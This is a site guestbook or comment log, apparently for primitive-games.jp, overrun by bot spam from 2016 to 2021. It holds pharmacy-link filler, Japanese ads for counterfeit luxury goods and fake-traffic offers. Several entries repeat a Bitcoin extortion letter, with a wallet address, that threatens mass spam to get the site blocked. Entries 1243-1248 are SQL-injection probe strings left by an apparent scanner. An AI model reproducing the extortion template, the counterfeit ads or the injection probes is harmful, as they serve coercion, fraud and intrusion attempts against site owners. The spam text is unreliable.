884. Guillermo: Have you got any ? - 2016/03/07 22:24:09
885. Jack: Could I have a statement, please? - 2016/03/07 22:24:12
886. Bradford: I'd like to change some money - 2016/03/07 22:24:15
887. Kraig: I work for a publishers - 2016/03/07 22:24:19
888. Johnathon: I'm a housewife - 2016/03/07 22:24:21
889. Jamison: Please wait - 2016/03/07 22:24:24
890. Heyjew: Insert your card - 2016/03/07 22:24:27
891. Benny: When can you start? - 2016/03/07 23:52:54
892. Louis: I'll text you later - 2016/03/07 23:52:56
893. Snoopy: Could you transfer $1000 from my current account to my deposit account? - 2016/03/07 23:52:59
894. Steve: What sort of music do you listen to? - 2016/03/07 23:53:02
895. Dewayne: I'd like to order some foreign currency - 2016/03/07 23:53:04
896. Hayden: Hold the line, please - 2016/03/07 23:53:06
897. Arianna: I've come to collect a parcel - 2016/03/07 23:53:08
898. Santos: Could I have a statement, please? - 2016/03/07 23:53:11
899. Bruce: How do you do? - 2016/03/07 23:53:14
900. Sylvester: A few months - 2016/03/07 23:53:17
901. Alfonso: I'm originally from Dublin but now live in Edinburgh - 2016/03/08 01:20:00
902. Blair: What company are you calling from? - 2016/03/08 01:20:02
903. Emile: Sorry, you must have the wrong number - 2016/03/08 01:20:05
904. Amado: I don't like pubs - 2016/03/08 01:20:07
905. Terence: I stay at home and look after the children - 2016/03/08 01:20:10
906. Kristopher: What's your number? - 2016/03/08 01:20:13
907. Charles: Thanks for calling - 2016/03/08 01:20:18
908. Emilio: How many more years do you have to go? - 2016/03/08 01:20:23
909. Cristopher: I'd like to cancel this standing order - 2016/03/08 01:20:26
910. Young: Will I have to work shifts? - 2016/03/08 01:20:30
911. Cedrick: We need someone with experience <a href=" ">canadian prescription weight loss drugs</a> Fueling a push into the immigration detention business, Esmor brought on Richard P. Staley, a former acting director of the Immigration and Naturalization Service’s central office in Washington, D.C., and added to its board Stuart M. Gerson, a former U.S. attorney general. At the time, the Justice Department oversaw both the INS and the Bureau of Prisons — two of Esmor’s biggest customers. The company also hired James C. Poland, who had worked in the Texas prison system, where Esmor was angling for new contracts. - 2016/03/08 07:00:50
912. Leroy: Could I have , please? <a href=" #wail ">hsa generic drugs</a> Mali&rsquo;s next president will be tasked with not only rebuilding the country&rsquo;s shattered economy but also resolving a simmering separatist movement in the far north. Voters heading to the polls on Sunday said they wanted a leader who could bring a lasting calm to the country following a year and a half of turmoil. - 2016/03/08 07:05:59
913. Pedro: A law firm <a href=" ">prescription drugs that cause gerd</a> A complaint by the siblings and their family alleged the facility in northwest Ohio was negligent, causing physical and emotional suffering for the patients and emotional distress for their parents. The sister awoke in a recovery area with no incision and initially feared her brother had died in surgery, the complaint said. Her parents worried about their daughter's prognosis and about their son losing a kidney in vain, it said. - 2016/03/08 19:09:23
914. Dominic: Some First Class stamps <a href=" #chemical ">online form for d pharmacy</a> The former Navy reservist and military subcontractor began treatment at the Veterans Administration in August. Alexis was not declared mentally unfit, which the AP noted would have lost him the secret security clearance he had from his days as a Navy reservist. - 2016/03/09 15:16:56
915. Kylie: I need to charge up my phone - 2016/03/09 15:40:39
916. Parker: How much notice do you have to give? - 2016/03/09 15:40:42
917. Lionel: Could you please repeat that? - 2016/03/09 15:40:47
918. Blake: Can you put it on the scales, please? - 2016/03/09 15:40:51
919. Hubert: There's a three month trial period - 2016/03/09 15:40:54
920. Nicky: Whereabouts are you from? - 2016/03/09 15:40:57
921. Modesto: Could you give me some smaller notes? - 2016/03/09 15:41:01
922. Lyman: Lost credit card - 2016/03/09 15:41:03
923. Dominic: I'd like to take the job - 2016/03/09 15:41:07
924. Francis: What company are you calling from? - 2016/03/09 15:41:10
925. Rigoberto: I'd like to open a personal account - 2016/03/09 17:08:14
926. Deandre: Not in at the moment - 2016/03/09 17:08:16
927. Gobiz: good material thanks - 2016/03/09 17:08:20
928. Trenton: I support Manchester United - 2016/03/09 17:08:22
929. Garfield: Insert your card - 2016/03/09 17:08:25
930. Claud: I'd like to send this parcel to - 2016/03/09 17:08:28
931. Louie: Do you play any instruments? - 2016/03/09 17:08:30
932. Roman: What sort of music do you listen to? - 2016/03/09 17:08:34
933. Merrill: Is this a temporary or permanent position? - 2016/03/09 17:08:37
934. Carlton: I've just graduated - 2016/03/09 17:08:40
935. Earle: I work here - 2016/03/09 18:34:40
936. Johnathan: I'd like a phonecard, please - 2016/03/09 18:34:44
937. Denny: How do I get an outside line? - 2016/03/09 18:34:47
938. Jamey: I enjoy travelling - 2016/03/09 18:34:52
939. Vincent: How many weeks' holiday a year are there? - 2016/03/09 18:34:54
940. Elden: I like it a lot - 2016/03/09 18:35:00
941. Gregg: I'd like to transfer some money to this account - 2016/03/09 18:35:03
942. Charlotte: Could you tell me my balance, please? - 2016/03/09 18:35:06
943. Dorian: I work for a publishers - 2016/03/09 18:35:09
944. Marshall: Do you play any instruments? - 2016/03/09 18:35:12
945. Grover: How many are there in a book? - 2016/03/09 20:00:49
946. Rodger: Whereabouts in are you from? - 2016/03/09 20:00:53
947. Chuck: I'd like some euros - 2016/03/09 20:00:56
948. Michal: What's the exchange rate for euros? - 2016/03/09 20:00:59
949. Alonzo: I'm at Liverpool University - 2016/03/09 20:01:02
950. Woodrow: I like watching football - 2016/03/09 20:01:05
951. Victor: I really like swimming - 2016/03/09 20:01:08
952. Clayton: I'm training to be an engineer - 2016/03/09 20:01:11
953. Odell: Is this a temporary or permanent position? - 2016/03/09 20:01:14
954. Gerard: I was made redundant two months ago - 2016/03/09 20:01:17
955. Ethan: US dollars - 2016/03/09 21:29:04
956. Norbert: Would you like a receipt? - 2016/03/09 21:29:07
957. Jane: How many are there in a book? - 2016/03/09 21:29:10
958. Porfirio: I'd like to cancel a cheque - 2016/03/09 21:29:13
959. Franklyn: Accountant supermarket manager - 2016/03/09 21:29:17
960. Lawrence: I can't hear you very well - 2016/03/09 21:29:20
961. Lindsay: A staff restaurant - 2016/03/09 21:29:24
962. Douglas: Could you ask him to call me? - 2016/03/09 21:29:27
963. Bailey: I've got a very weak signal - 2016/03/09 21:29:31
964. Woodrow: I'm on holiday - 2016/03/09 21:29:34
965. Enrique: Until August - 2016/03/09 22:57:10
966. Stephan: Another year - 2016/03/09 22:57:14
967. Steep777: It's serious - 2016/03/09 22:57:17
968. Freddie: A few months - 2016/03/09 22:57:21
969. Arturo: I didn't go to university - 2016/03/09 22:57:25
970. Simon: I can't get through at the moment - 2016/03/09 22:57:29
971. Wilford: How many days will it take for the cheque to clear? - 2016/03/09 22:57:33
972. Christian: A company car - 2016/03/09 22:57:37
973. Adalberto: I'm a member of a gym - 2016/03/09 22:57:39
974. Claudio: When can you start? - 2016/03/09 22:57:42
975. Julius: I work with computers - 2016/03/10 00:23:29
976. Carlos: I'd like to speak to someone about a mortgage - 2016/03/10 00:23:31
977. Evelyn: What line of work are you in? - 2016/03/10 00:23:34
978. DE: Do you know the address? - 2016/03/10 00:23:37
979. Ella: I stay at home and look after the children - 2016/03/10 00:23:40
980. Fabian: Until August - 2016/03/10 00:23:43
981. Tilburg: What company are you calling from? - 2016/03/10 00:23:46
982. Waldo: I can't get a signal - 2016/03/10 00:23:49
983. Sergio: We need someone with experience - 2016/03/10 00:23:52
984. Savannah: Have you got a telephone directory? - 2016/03/10 00:23:56
985. Devon: What do you do for a living? - 2016/03/10 01:50:51
986. Sandy: Where do you live? - 2016/03/10 01:50:54
987. Harvey: I can't get a dialling tone - 2016/03/10 01:50:56
988. Garry: Recorded Delivery - 2016/03/10 01:50:59
989. Scotty: I love this site - 2016/03/10 01:51:04
990. Travis: Just over two years - 2016/03/10 01:51:07
991. Rupert: I'm on work experience - 2016/03/10 01:51:11
992. Craig: I'd like to send this parcel to - 2016/03/10 01:51:14
993. Travis: Is it convenient to talk at the moment? - 2016/03/10 01:51:17
994. Fredric: Pleased to meet you - 2016/03/10 01:51:21
995. Fifa55: Photography - 2016/03/10 03:17:41
996. Desmond: The United States - 2016/03/10 03:17:44
997. Teddy: I'm a housewife - 2016/03/10 03:17:46
998. Hector: Where do you study? - 2016/03/10 03:17:49
999. Dudley: Do you know each other? - 2016/03/10 03:17:53
1000. Xavier: I work with computers - 2016/03/10 03:17:57
1001. Foster: Could I ask who's calling? - 2016/03/10 03:18:02
1002. Leroy: One moment, please - 2016/03/10 03:18:04
1003. Leah: I'm not working at the moment - 2016/03/10 03:18:07
1004. Lightsoul: I'm doing a masters in law - 2016/03/10 03:18:09
1005. Lindsey: We've got a joint account - 2016/03/10 04:44:27
1006. Horacio: I can't get a signal - 2016/03/10 04:44:29
1007. Freeman: I've only just arrived - 2016/03/10 04:44:32
1008. Domingo: I hate shopping - 2016/03/10 04:44:36
1009. Genesis: How long have you lived here? - 2016/03/10 04:44:41
1010. Elijah: Very Good Site - 2016/03/10 04:44:44
1011. Ava: We'd like to offer you the job - 2016/03/10 04:44:46
1012. Angel: Whereabouts in are you from? - 2016/03/10 04:44:49
1013. Richard: Looking for work - 2016/03/10 04:44:55
1014. Stacy: I'm sorry, I'm not interested - 2016/03/10 04:44:59
1015. Johnny: I'm self-employed - 2016/03/10 06:11:39
1016. Kendall: The United States - 2016/03/10 06:11:43
1017. Hayden: I'd like to open a business account - 2016/03/10 06:11:46
1018. Dwain: I'd like to apply for this job - 2016/03/10 06:11:49
1019. Efrain: Directory enquiries - 2016/03/10 06:11:53
1020. Bonser: Until August - 2016/03/10 06:11:56
1021. Chuck: Remove card - 2016/03/10 06:11:59
1022. Evan: Could you ask her to call me? - 2016/03/10 06:12:02
1023. Evelyn: A few months - 2016/03/10 06:12:04
1024. Jerrell: I'm not sure - 2016/03/10 06:12:08
1025. Bennie: A packet of envelopes - 2016/03/10 07:48:49
1026. Erin: This is the job description - 2016/03/10 07:48:52
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1227. : - 2017/06/22 04:11:32
1228. ルイヴィトン 財布N級品: ブランドコピー品激安通販店弊社スーパーコピー時計激安通販偽物販売ショップ!メンズ時計専門店をご覧頂き誠にありがとうございます。豊富な品数を備えているほか、スーパーコピーの最新入荷を追い求めその最新作品のコピー品を提供する一方スーパーコピー品の供給を保証することができます。超人気高級ウブロ・ロレックス・オメガ・フランクミュラー・カルティエ等提供してあげます!ブランド時計専門店はお客様がご安心に購入いただけるように最高ランクの『スーパーコピー』N級品のみを扱っており、取扱い販売をさせていただいております。海外スーパーコピーのスーパーコピー バッグ、アクセサリースーパーコピー時計、貴金属の(リサイクル品)のスーパーコピー販売・買取 ホームページ上でのご注文は24時間受け付けております - 2018/09/07 00:04:02
1229. スーパーコピーブランド専門店: ブランド偽物(コピー商品)激安市場━…━…━…━…━…━…━…━…━…━…━…ルイ.ヴィトン、シャネル、グッチ、エルメス、クロエ、ブラダ、ブルガリ ドルチェ&ガッバ―ナ、バレンシアガ、ボッテガ.ヴェネタ偽物(コピー商品)のブランドのバッグ、財布の販売、通販。━…━…━…━…━…━…━…━…━…━…━…○各種のブランド偽物(コピー商品)の指輪.ネックレス○各種のブランド偽物(コピー商品)のベルト○各種のブランド偽物(コピー商品)のマフラー○ スタイルが多い、品質がよい、価格が低い! ○ S品質 シリアル付きも有り 付属品完備! ○必ずご満足頂ける品質の商品のみ販売しております. ○ 品質を最大限本物と同等とする為に相応の材質にて製作している為です.○ 絶対に満足して頂ける品のみ皆様にお届け致します.人気の売れ筋商品を多数取り揃えております。全て激安特価でご提供.お願いします。 - 2018/10/10 22:20:18
1230. 日本最高級激安高品質: 世界一流ウブロ コピーを愛好する多くの方々にご満足いただけるブランド コピー時計品のウブロ スーパーコピー偽物。本店が扱ウブロ スーパーコピー品は正規品と同等品質なのブランドコピーの様々を提供してい,代引き偽物販売専門店。ウブロスーパーコピー - 2018/10/11 08:52:15
1231. : Hello. And Bye. - 2018/10/13 20:04:50
1232. : Hello. And Bye. Vghrufwiodjowifuegijefqolw - 2018/10/13 23:21:17
1233. : Hey. Soon your hosting account and your domain primitive-games.jp will be blocked forever, and you will receive tens of thousands of negative feedback from angry people.Pay me 0.5 BTC until June 1, 2019. Otherwise, you will get the reputation of a malicious spammer, your site primitive-games.jp will be blocked for life and you will be sued for insulting believers. I guarantee this to you. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL Here is a list of what you get if you don’t follow my requirements: + abuse spamhouse for aggressive web spam + tens of thousands of negative reviews about you and your website from angry people for aggressive web and email spam + lifetime blocking of your hosting account for aggressive web and email spam + lifetime blocking of your domain for aggressive web and email spam + Thousands of angry complaints from angry people will come to your mail and messengers for sending you a lot of spam + complete destruction of your reputation and loss of clients forever + for a full recovery from the damage you need tens of thousands of dollars All of the above will result in blocking your domain and hosting account for life. The price of your peace of mind is 0.5 BTC. Do you want this? If you do not want the above problems, then before June 1, 2019, you need to send me 0.5 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL How do I do all this to get this result: 1. I will send messages to 33 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you and the spammer and insult people. And everyone will not care that it is not you. 2. I’ll send messages to 19,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address primitive-games.jp and your contact details. And then send out abusive messages with the address of your site. 3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315 900 sites from which you will definitely get a huge amount of abuse) of your site primitive-games.jp. After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life. Your domain registrar will also block your domain permanently. All of the above will result in blocking your domain and hosting account for life. If you do not want to receive thousands of complaints from users and your hosting provider, then pay before June 1, 2019. The price of your peace of mind is 0.5 BTC. Otherwise, I will send your site through tens of millions of sites that will lead to the blocking of your site for life and you will lose everything and your reputation as well. But get a reputation as a malicious spammer. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL - 2019/05/25 12:57:10
1234. : Hey. Soon your hosting account and your domain primitive-games.jp will be blocked forever, and you will receive tens of thousands of negative feedback from angry people.Pay me 0.5 BTC until June 1, 2019. Otherwise, you will get the reputation of a malicious spammer, your site primitive-games.jp will be blocked for life and you will be sued for insulting believers. I guarantee this to you. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL Here is a list of what you get if you don’t follow my requirements: + abuse spamhouse for aggressive web spam + tens of thousands of negative reviews about you and your website from angry people for aggressive web and email spam + lifetime blocking of your hosting account for aggressive web and email spam + lifetime blocking of your domain for aggressive web and email spam + Thousands of angry complaints from angry people will come to your mail and messengers for sending you a lot of spam + complete destruction of your reputation and loss of clients forever + for a full recovery from the damage you need tens of thousands of dollars All of the above will result in blocking your domain and hosting account for life. The price of your peace of mind is 0.5 BTC. Do you want this? If you do not want the above problems, then before June 1, 2019, you need to send me 0.5 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL How do I do all this to get this result: 1. I will send messages to 33 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you and the spammer and insult people. And everyone will not care that it is not you. 2. I’ll send messages to 19,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address primitive-games.jp and your contact details. And then send out abusive messages with the address of your site. 3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315 900 sites from which you will definitely get a huge amount of abuse) of your site primitive-games.jp. After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life. Your domain registrar will also block your domain permanently. All of the above will result in blocking your domain and hosting account for life. If you do not want to receive thousands of complaints from users and your hosting provider, then pay before June 1, 2019. The price of your peace of mind is 0.5 BTC. Otherwise, I will send your site through tens of millions of sites that will lead to the blocking of your site for life and you will lose everything and your reputation as well. But get a reputation as a malicious spammer. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL - 2019/05/25 12:57:14
1235. : Hey. Soon your hosting account and your domain primitive-games.jp will be blocked forever, and you will receive tens of thousands of negative feedback from angry people.Pay me 0.5 BTC until June 1, 2019. Otherwise, you will get the reputation of a malicious spammer, your site primitive-games.jp will be blocked for life and you will be sued for insulting believers. I guarantee this to you. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL Here is a list of what you get if you don’t follow my requirements: + abuse spamhouse for aggressive web spam + tens of thousands of negative reviews about you and your website from angry people for aggressive web and email spam + lifetime blocking of your hosting account for aggressive web and email spam + lifetime blocking of your domain for aggressive web and email spam + Thousands of angry complaints from angry people will come to your mail and messengers for sending you a lot of spam + complete destruction of your reputation and loss of clients forever + for a full recovery from the damage you need tens of thousands of dollars All of the above will result in blocking your domain and hosting account for life. The price of your peace of mind is 0.5 BTC. Do you want this? If you do not want the above problems, then before June 1, 2019, you need to send me 0.5 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL How do I do all this to get this result: 1. I will send messages to 33 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you and the spammer and insult people. And everyone will not care that it is not you. 2. I’ll send messages to 19,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address primitive-games.jp and your contact details. And then send out abusive messages with the address of your site. 3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315 900 sites from which you will definitely get a huge amount of abuse) of your site primitive-games.jp. After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life. Your domain registrar will also block your domain permanently. All of the above will result in blocking your domain and hosting account for life. If you do not want to receive thousands of complaints from users and your hosting provider, then pay before June 1, 2019. The price of your peace of mind is 0.5 BTC. Otherwise, I will send your site through tens of millions of sites that will lead to the blocking of your site for life and you will lose everything and your reputation as well. But get a reputation as a malicious spammer. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL - 2019/05/25 12:57:14
1236. : Hey. Soon your hosting account and your domain primitive-games.jp will be blocked forever, and you will receive tens of thousands of negative feedback from angry people.Pay me 0.5 BTC until June 1, 2019. Otherwise, you will get the reputation of a malicious spammer, your site primitive-games.jp will be blocked for life and you will be sued for insulting believers. I guarantee this to you. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL Here is a list of what you get if you don’t follow my requirements: + abuse spamhouse for aggressive web spam + tens of thousands of negative reviews about you and your website from angry people for aggressive web and email spam + lifetime blocking of your hosting account for aggressive web and email spam + lifetime blocking of your domain for aggressive web and email spam + Thousands of angry complaints from angry people will come to your mail and messengers for sending you a lot of spam + complete destruction of your reputation and loss of clients forever + for a full recovery from the damage you need tens of thousands of dollars All of the above will result in blocking your domain and hosting account for life. The price of your peace of mind is 0.5 BTC. Do you want this? If you do not want the above problems, then before June 1, 2019, you need to send me 0.5 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL How do I do all this to get this result: 1. I will send messages to 33 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you and the spammer and insult people. And everyone will not care that it is not you. 2. I’ll send messages to 19,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address primitive-games.jp and your contact details. And then send out abusive messages with the address of your site. 3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315 900 sites from which you will definitely get a huge amount of abuse) of your site primitive-games.jp. After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life. Your domain registrar will also block your domain permanently. All of the above will result in blocking your domain and hosting account for life. If you do not want to receive thousands of complaints from users and your hosting provider, then pay before June 1, 2019. The price of your peace of mind is 0.5 BTC. Otherwise, I will send your site through tens of millions of sites that will lead to the blocking of your site for life and you will lose everything and your reputation as well. But get a reputation as a malicious spammer. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL - 2019/05/25 13:10:12
1237. : Hey. Soon your hosting account and your domain primitive-games.jp will be blocked forever, and you will receive tens of thousands of negative feedback from angry people.Pay me 0.5 BTC until June 1, 2019. Otherwise, you will get the reputation of a malicious spammer, your site primitive-games.jp will be blocked for life and you will be sued for insulting believers. I guarantee this to you. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL Here is a list of what you get if you don’t follow my requirements: + abuse spamhouse for aggressive web spam + tens of thousands of negative reviews about you and your website from angry people for aggressive web and email spam + lifetime blocking of your hosting account for aggressive web and email spam + lifetime blocking of your domain for aggressive web and email spam + Thousands of angry complaints from angry people will come to your mail and messengers for sending you a lot of spam + complete destruction of your reputation and loss of clients forever + for a full recovery from the damage you need tens of thousands of dollars All of the above will result in blocking your domain and hosting account for life. The price of your peace of mind is 0.5 BTC. Do you want this? If you do not want the above problems, then before June 1, 2019, you need to send me 0.5 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL How do I do all this to get this result: 1. I will send messages to 33 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you and the spammer and insult people. And everyone will not care that it is not you. 2. I’ll send messages to 19,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address primitive-games.jp and your contact details. And then send out abusive messages with the address of your site. 3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315 900 sites from which you will definitely get a huge amount of abuse) of your site primitive-games.jp. After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life. Your domain registrar will also block your domain permanently. All of the above will result in blocking your domain and hosting account for life. If you do not want to receive thousands of complaints from users and your hosting provider, then pay before June 1, 2019. The price of your peace of mind is 0.5 BTC. Otherwise, I will send your site through tens of millions of sites that will lead to the blocking of your site for life and you will lose everything and your reputation as well. But get a reputation as a malicious spammer. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL - 2019/05/25 13:10:14
1238. : Hey. Soon your hosting account and your domain primitive-games.jp will be blocked forever, and you will receive tens of thousands of negative feedback from angry people.Pay me 0.5 BTC until June 1, 2019. Otherwise, you will get the reputation of a malicious spammer, your site primitive-games.jp will be blocked for life and you will be sued for insulting believers. I guarantee this to you. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL Here is a list of what you get if you don’t follow my requirements: + abuse spamhouse for aggressive web spam + tens of thousands of negative reviews about you and your website from angry people for aggressive web and email spam + lifetime blocking of your hosting account for aggressive web and email spam + lifetime blocking of your domain for aggressive web and email spam + Thousands of angry complaints from angry people will come to your mail and messengers for sending you a lot of spam + complete destruction of your reputation and loss of clients forever + for a full recovery from the damage you need tens of thousands of dollars All of the above will result in blocking your domain and hosting account for life. The price of your peace of mind is 0.5 BTC. Do you want this? If you do not want the above problems, then before June 1, 2019, you need to send me 0.5 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL How do I do all this to get this result: 1. I will send messages to 33 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you and the spammer and insult people. And everyone will not care that it is not you. 2. I’ll send messages to 19,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address primitive-games.jp and your contact details. And then send out abusive messages with the address of your site. 3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315 900 sites from which you will definitely get a huge amount of abuse) of your site primitive-games.jp. After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life. Your domain registrar will also block your domain permanently. All of the above will result in blocking your domain and hosting account for life. If you do not want to receive thousands of complaints from users and your hosting provider, then pay before June 1, 2019. The price of your peace of mind is 0.5 BTC. Otherwise, I will send your site through tens of millions of sites that will lead to the blocking of your site for life and you will lose everything and your reputation as well. But get a reputation as a malicious spammer. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL - 2019/05/25 13:13:16
1239. : Hey. Soon your hosting account and your domain primitive-games.jp will be blocked forever, and you will receive tens of thousands of negative feedback from angry people.Pay me 0.5 BTC until June 1, 2019. Otherwise, you will get the reputation of a malicious spammer, your site primitive-games.jp will be blocked for life and you will be sued for insulting believers. I guarantee this to you. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL Here is a list of what you get if you don’t follow my requirements: + abuse spamhouse for aggressive web spam + tens of thousands of negative reviews about you and your website from angry people for aggressive web and email spam + lifetime blocking of your hosting account for aggressive web and email spam + lifetime blocking of your domain for aggressive web and email spam + Thousands of angry complaints from angry people will come to your mail and messengers for sending you a lot of spam + complete destruction of your reputation and loss of clients forever + for a full recovery from the damage you need tens of thousands of dollars All of the above will result in blocking your domain and hosting account for life. The price of your peace of mind is 0.5 BTC. Do you want this? If you do not want the above problems, then before June 1, 2019, you need to send me 0.5 BTC to my Bitcoin wallet: 19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL How do I do all this to get this result: 1. I will send messages to 33 000 000 sites with contact forms with offensive messages with the address of your site, that is, in this situation, you and the spammer and insult people. And everyone will not care that it is not you. 2. I’ll send messages to 19,000,000 email addresses and very intrusive advertisements for making money and offer a free iPhone with your website address primitive-games.jp and your contact details. And then send out abusive messages with the address of your site. 3. I will do aggressive spam on blogs, forums and other sites (in my database there are 35 978 370 sites and 315 900 sites from which you will definitely get a huge amount of abuse) of your site primitive-games.jp. After such spam, the spamhouse will turn its attention on you and after several abuses your host will be forced to block your account for life. Your domain registrar will also block your domain permanently. All of the above will result in blocking your domain and hosting account for life. If you do not want to receive thousands of complaints from users and your hosting provider, then pay before June 1, 2019. The price of your peace of mind is 0.5 BTC. Otherwise, I will send your site through tens of millions of sites that will lead to the blocking of your site for life and you will lose everything and your reputation as well. But get a reputation as a malicious spammer. My bitcoin wallet:19ckouUP2E22aJR5BPFdf7jP2oNXR3bezL - 2019/05/25 13:15:19
1240. ウブロスーパーコピー: ルイヴィトンコピー品第1店 販売専門店★真のスーパーコピー品質をお届けするルイヴィトンブランドコピー!※価値あるブランドスーパーコピー財布、バッグのヴィトンコピー※■品質重視なブランドコピー商品販売!★高級品☆┃時計┃バッグ┃財 布┃その他┃◆★ 誠実★信用★顧客は至上●在庫情報随時更新!品質がよい 価格が低い 実物写真 品質を重視 100%品質保証 100%満足保障 信用第一 ★人気最新品┃特恵中┃☆腕時計、バッグ、財布、ベルト、靴、帽子、アクセサリー、小物☆★当店商品送料無料日本全国!※全物品激安,到着するのは迅速で、安全。■あなたの訪問のを期待しています!☆ヽ(▽⌒)会社名称 ルイヴィトンコピーN品第1店ホームページ上でのご注文は24時間受け付けております - 2019/06/14 05:01:22
1241. シャネル スーパーコピー トート: スーパーコピーブランド通販 ブランドスーパーコピー格安買取価値あるスーパーコピー財布、バッグのルイヴィトンコピー販売専門店日本最大級スーパーコピー、通販、ヴィトンコピー、代引き、レプリカ、財布激安、卸売り、偽物、シャネル財布、バッグ、時計、代金引換、スーパーコピー専門店販売送料無料。ホームページ上でのご注文は24時間受け付けております - 2019/12/29 03:06:32
1242. : HoOkAh MaGic наш официальный брендНабрав в поисковике Вы можете посетить наш сайт и возможно приобрести кальяны и всё для них. Доставка по всей России Бесплатная консультация Отправка в день заказа Персональные скидки Строго 18+ - 2020/07/23 21:38:09
1243. 1: 1) - 2020/08/22 06:59:54
1244. 1: 1"'`-- - 2020/08/22 06:59:54
1245. 1): 1 - 2020/08/22 06:59:55
1246. 1: 1"'`-- - 2020/08/22 07:01:24
1247. 1: 1) - 2020/08/22 07:01:24
1248. 1: 1 - 2020/08/22 07:01:24
1249. : 7oGMwDnN9XvFOPPPiVYkLzFTb0NzjUPInEROYX5COdXOGf9UEwbjqZPKB0myrOmOeTxBQYzUKlZvBjGy8Dhkso24GPWJgqofGjO9tXUQrpFSUgUqS2IlEZ3ocDeVn2SC6QFb370ArgD9F1qQI0SO57STqD3iE9My - 2020/11/20 12:35:21
1250. : HelloYOU NEED QUALITY VISITORS FOR YOUR: primitive-games.jp ? WE PROVIDE HIGH-QUALITY VISITORS WITH:- 100% safe for your site- real visitors with unique IPs. No bots, proxies, or datacenters- visitors from Search Engine (by keyword)- visitors from Social Media Sites (referrals)- visitors from any country you want (USA/UK/CA/EU…)- very low bounce rate- very long visit duration- multiple pages visited- tractable in google analytics- custom URL tracking provided- boost ranking in SERP, SEO, profit from CPM CLAIM YOUR 24 HOURS FREE TEST HERE=> ventfara@mail.com Thanks, Audrey Wrenn - 2021/01/26 21:55:30
1251. : HelloYOU NEED QUALITY VISITORS FOR YOUR: skr.jp ? WE PROVIDE HIGH-QUALITY VISITORS WITH:- 100% safe for your site- real visitors with unique IPs. No bots, proxies, or datacenters- visitors from Search Engine (by keyword)- visitors from Social Media Sites (referrals)- visitors from any country you want (USA/UK/CA/EU…)- very low bounce rate- very long visit duration- multiple pages visited- tractable in google analytics- custom URL tracking provided- boost ranking in SERP, SEO, profit from CPM CLAIM YOUR 24 HOURS FREE TEST HERE=> ventfara@mail.com Thanks, Laurel Britt - 2021/02/08 06:07:09
1252. : mns1984183uttjr xtoT7ig oZJo pONHhaM - 2021/02/11 12:49:10
1253. : HelloYOU NEED QUALITY VISITORS FOR YOUR: primitive-games.jp ? WE PROVIDE HIGH-QUALITY VISITORS WITH:- 100% safe for your site- real visitors with unique IPs. No bots, proxies, or datacenters- visitors from Search Engine (by keyword)- visitors from Social Media Sites (referrals)- visitors from any country you want (USA/UK/CA/EU…)- very low bounce rate- very long visit duration- multiple pages visited- tractable in google analytics- custom URL tracking provided- boost ranking in SERP, SEO, profit from CPM CLAIM YOUR 24 HOURS FREE TEST HERE=> ventfara@mail.com Thanks, Janette Waterworth - 2021/03/02 14:57:49
1254. : HelloYOU NEED QUALITY VISITORS FOR YOUR: skr.jp ? WE PROVIDE HIGH-QUALITY VISITORS WITH:- 100% safe for your site- real visitors with unique IPs. No bots, proxies, or datacenters- visitors from Search Engine (by keyword)- visitors from Social Media Sites (referrals)- visitors from any country you want (USA/UK/CA/EU…)- very low bounce rate- very long visit duration- multiple pages visited- tractable in google analytics- custom URL tracking provided- boost ranking in SERP, SEO, profit from CPM CLAIM YOUR 24 HOURS FREE TEST HERE=> ventfara@mail.com Thanks, Felipe Munger - 2021/03/13 18:01:28
